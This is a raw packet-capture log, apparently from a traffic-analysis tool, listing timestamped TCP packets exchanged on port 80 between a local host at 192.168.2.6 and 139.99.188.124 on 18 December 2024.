                                                                    Dec 18, 2024 09:19:20.178613901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.178647995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.179474115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.179534912 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.179553986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.180710077 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.180774927 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.180788994 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.181996107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.182046890 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.182076931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.183278084 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.183330059 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.183392048 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.184531927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.184576988 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.184637070 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.185935020 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.185955048 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.186038017 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.187129974 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.187181950 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.187266111 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.188426971 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.188467979 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.188505888 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.189721107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.189776897 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.189796925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.191059113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.191160917 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.191195011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.192295074 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.192353964 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.192394972 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.193598032 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.193665981 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.193701029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.194900036 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.194969893 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.194989920 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.196201086 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.196280956 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.196281910 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.197463036 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.197520971 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.197561979 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.198777914 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.198823929 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.198853970 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.200068951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.200122118 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.200154066 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.201348066 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.201401949 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.201491117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.202651024 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.202722073 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.202759027 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.203903913 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.204092026 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.315493107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.315515041 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.315612078 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.316019058 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.316183090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.316236973 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.317095995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.317234993 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.317364931 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.318149090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.318245888 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.318344116 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.319190025 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.319328070 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.319367886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.320251942 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.320416927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.320468903 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.321250916 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.321389914 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.321460962 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.322305918 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.322391033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.322433949 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.323299885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.323411942 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.323493958 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.324299097 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.324418068 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.324568033 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.339435101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.339581966 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.339651108 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.339896917 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340101957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340147018 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.340838909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340889931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340934992 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.341830969 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.341922998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.342000008 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.342804909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.342885017 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.342925072 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.343774080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.343863010 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.343911886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.344779015 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.344887972 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.344999075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.345752954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.345803022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.345838070 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.346738100 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.346857071 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.346903086 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.347723961 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.347878933 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.347927094 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.348695993 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.348754883 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.348970890 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.349695921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.349828959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.349890947 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.350738049 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.350888014 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.350924969 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.351666927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.351788044 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.351839066 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.352649927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.352807045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.352850914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.353741884 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.353912115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.353950977 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.354990005 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.355045080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.355148077 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.355767012 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.355823040 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.356064081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.356985092 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.357089043 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.357134104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.358019114 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.358119965 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.358155966 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.359388113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.359441042 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.359478951 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.360052109 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360141039 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360209942 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.360625982 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360759974 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360796928 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.361515045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.361594915 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.361628056 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.362497091 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.362600088 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.362636089 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.363467932 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.363580942 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.363624096 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.364464998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.364581108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.364619970 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.365470886 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.365547895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.365586996 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.366429090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.366518021 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.366552114 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.367432117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.367547035 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.367584944 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.368416071 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.368479013 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.368515015 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.369384050 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.369534016 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.369599104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.370373011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.370472908 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.370515108 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.371361971 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.371505976 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.371553898 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.372330904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.372442007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.372486115 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.373359919 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.373471022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.373512030 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.374329090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.374442101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.374480009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.375294924 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.375386953 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.375500917 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.376311064 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.376365900 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.376410007 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.377302885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.377376080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.377414942 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.378279924 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.378390074 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.378432989 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.379307032 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.379394054 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.379429102 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.380280018 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.380371094 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.380414009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.381177902 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.436109066 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.506781101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.506819963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.506894112 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.507033110 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.507153988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.507199049 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.507978916 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.508071899 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.508117914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.508991003 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.509115934 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.509186029 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.509972095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.510083914 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.510124922 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.510950089 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.511051893 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.511092901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.511928082 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.512059927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.512100935 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.512975931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.513025999 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.513118982 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.513942957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.514027119 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.514898062 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.514928102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.515043020 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.515083075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.515863895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.530786037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.530869007 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.530905962 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.531357050 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.531411886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.531480074 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.532224894 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.532273054 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.532315016 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.533304930 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.533348083 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.533473015 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.534725904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.534789085 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.534815073 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.535650969 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.535708904 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.535769939 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.536942959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.536981106 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.537028074 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.538259983 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.538321018 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.538410902 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.539139032 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.539187908 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.539239883 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.540369987 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.540431023 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.540493011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.541631937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.541673899 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.541778088 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.542788982 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.542826891 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.542841911 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.543339014 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.543385983 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.543432951 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.543976068 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.544013023 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.544023037 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.544576883 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.544620037 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.544636965 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.545366049 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.545407057 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.545445919 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.546216011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.546266079 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.546293974 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.547276020 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.547327995 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.547430038 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.548691988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.548738956 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.548754930 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.549652100 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.549745083 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.549796104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.550654888 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.550702095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.550709009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.551826954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.551871061 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.551970005 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.553000927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.553064108 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.553158045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.554014921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.554074049 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.554169893 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.554960012 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.555015087 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.555062056 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.556350946 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.556391954 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.556408882 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.556579113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.556592941 CET8049721139.99.188.124192.168.2.6
